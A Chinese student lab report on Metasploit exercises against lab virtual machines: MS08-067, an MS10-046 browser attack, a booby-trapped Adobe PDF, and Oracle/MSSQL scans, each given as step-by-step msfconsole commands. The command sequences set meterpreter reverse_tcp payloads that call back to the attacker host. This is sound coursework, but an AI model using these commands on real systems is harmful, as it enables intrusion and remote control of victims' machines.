1、實驗內容sql
(1)一個主動攻擊,如ms08_067;數據庫
(2) 一個針對瀏覽器的攻擊,如ms11_050;windows
(3)一個針對客戶端的攻擊,如Adobe;api
(4)成功應用任何一個輔助模塊。瀏覽器
2、實驗後問題回答安全
(1)用本身的話解釋什麼是exploit,payload,encode。服務器
Exploit就是漏洞利用,有exploit確定有漏洞,因此滲透攻擊就是利用一個系統、應用或服務中的安全漏洞進行攻擊;網絡
Payload就是有效載荷,在滲透攻擊後植入目標系統執行代碼。session
Encode就是編碼,經過改變特徵碼,對攻擊載荷進行「免殺」處理。oracle
(2)離實戰還缺些什麼技術或步驟?
我以爲離實戰還遠得很啊,一是靶機是很低很低的Windowsxp系統,瀏覽器IE版本也很低,在虛擬機上打開網頁的時候都會提醒要更新了,實際上的電腦應該不會有這麼低版本的,也看到有同窗利用了新的漏洞攻擊了Windows7的系統,我也查找了一些其餘的漏洞,仍是由於本身的技術過低沒有完成。二是在攻擊瀏覽器的時候,須要靶機訪問生成的網址,實戰中那麼明顯的IP網址通常不會輕易訪問,仍是要進行假裝。
3、實驗體會
此次實驗是使用漏洞攻擊,真的是作的特別的艱難了,本身的垃圾電腦帶不起來兩個虛擬機,跟同窗合做用兩臺虛擬機常常ping不通(防火牆也關了,抓取ping包那個也設置了也不行),最後直接借了一臺高配置的電腦完成一部分,心累啊~在實驗中以爲要注意一下:一是配置的時候經常使用show options看看配置有沒有錯,有時候暈了的時候會把攻擊的IP和靶機的設置反了,或者是有端口號會變之類的問題;二是看看Linux和win虛擬機能不能ping通。
4、實踐過程
(一)windows服務滲透攻擊(MS08-067漏洞攻擊)
1.使攻擊機與靶機相互ping通,攻擊機IP:10.1.1.242,靶機IP:10.1.1.236
2.啓動msf終端。
使用search命令搜索該漏洞對應的模塊:(能夠看到漏洞的時間是2008年的)
啓用該滲透攻擊模塊,選擇運行後門回連控制端的攻擊載荷,配置滲透攻擊所需的配置項:
啓用 :use exploit/windows/smb/ms08_067_netapi
設置滲透目標IP: set RHOST 10.1.1.236
設置攻擊機端口: set LPORT 4319
設置攻擊機IP: set LHOST 10.1.1.242
設置目標系統類型: set target 0
3.發起滲透攻擊顯示攻擊成功後,在攻擊機上執行ipconfig命令驗證結果,能夠執行:
(二)瀏覽器滲透攻擊(ms10_046漏洞攻擊)
1.啓動msf終端,使用search命令搜索該漏洞對應的模塊:
2. 啓用該滲透攻擊模塊 use exploit/windows/browser/ms10_046_shortcut_icon_dlloader
選擇運行後門回連控制端的攻擊載荷,用 show payloads
設置攻擊載荷爲: set paylod windows/meterpreter/reverse_tcp
配置滲透攻擊所需的配置項: show options
設置服務器地址: set SRVHOST 192.168.43.6
設置端口: set LPORT 4319
設置靶機IP: set LHOST 192.168.42.134
設置完成後鍵入 exploit 發起攻擊:
上圖我錯誤的設置了URIPATH爲4319,應該爲默認的「/」,修改後從新運行
生成一個URL 地址:http://192.168.43.6:80/
3.在靶機中啓動IE瀏覽器,訪問連接http://192.168.43.6:80/
在攻擊機MSF終端中能夠看到以下信息:
能夠看到從靶機傳來的不少數據。
而在靶機的網頁上回生成兩個文件:
4.使用sessions-l命令查看當前監聽端的活動會話。
運行 sessions 命令,查看當前的會話信息
奇怪的是我查看了會話信息並無會話,可是以前明明收到來自靶機的信息,而後回到靶機上查看,發現是靶機卡住了,網頁沒有響應,而後個人整個電腦都卡住了,最後只能強制關機了,但已經能看到從靶機傳回來的數據,因此算是成功了
(三)Adobe閱讀器滲透攻擊
1.使攻擊機與靶機相互ping通,攻擊機IP:10.1.1.242,靶機IP:10.1.1.190
2.啓動msf終端。
配置滲透攻擊所需的配置項:
設置載荷: set payload windows/meterpreter/reverse_tcp
設置攻擊機IP: set LHOST 10.1.1.242
設置端口: set LPORT 8443
設置產生的文件: set FILENAME 4319.pdf
設置完成後鍵入 exploit :
3.根據路徑找到該pdf文件放到靶機裏。
4.使用命令 back 退出當前模塊,啓動一個對應於載荷的監聽端,等待靶機回連,並執行 exploit :
5.在靶機中雙擊打開該文件,監聽端接到來自靶機的Meterpreter鏈接,輸入命令 sysinfo ,可對靶機環境進行基本的查詢,攻擊成功:
(四)Oracle數據庫服務查點
各類網絡數據庫的網絡服務端口是漏洞頻發的「重災區」,好比Microsoft SQL Server的1433端口(第五部分),以及Oracle SQL監聽器(tnslsnr)使用的1521端口。可使用mssql_ping模塊查找網絡中的Microsoft SQL Server,使用tnslsnr_version模塊查找網絡中開放端口的Oracle監聽器服務。
1.使用 use auxiliary/scanner/oracle/tnslsnr_version 模塊查找網絡中開發端口的Oracle監聽器服務。
2.設置相關配置項:(先用 show options 查看要設置的內容)
設置掃描區段: set RHOST 172.30.4.0/24
設置線程: set THREADS 50
命令 run 開始掃描,掃描完成,但沒有在網絡中發現後臺服務器上開放的Oracle數據庫。
(五)mssql掃描
配置不當的MS SQL一般是進入目標系統的第一個後門。
MS SQL安裝後,默認監聽在TCP端口1433或使用隨機的動態TCP端口。隨機狀況下,使用mssql_ping模塊,獲取隨機的TCP端口。
當Metasploit發現MS SQL服務器後,他會將全部可以獲取的關於服務器的信息都顯示出來。
1.使用 use auxiliary/scanner/oracle/tnslsnr_version 模塊
2.設置相關配置項:(先用 show options 查看要設置的內容)
設置掃描區段: set RHOST 172.30.4.0/24
設置線程: set THREADS 50
命令 run 開始掃描,掃描完成,也沒有發現數據庫。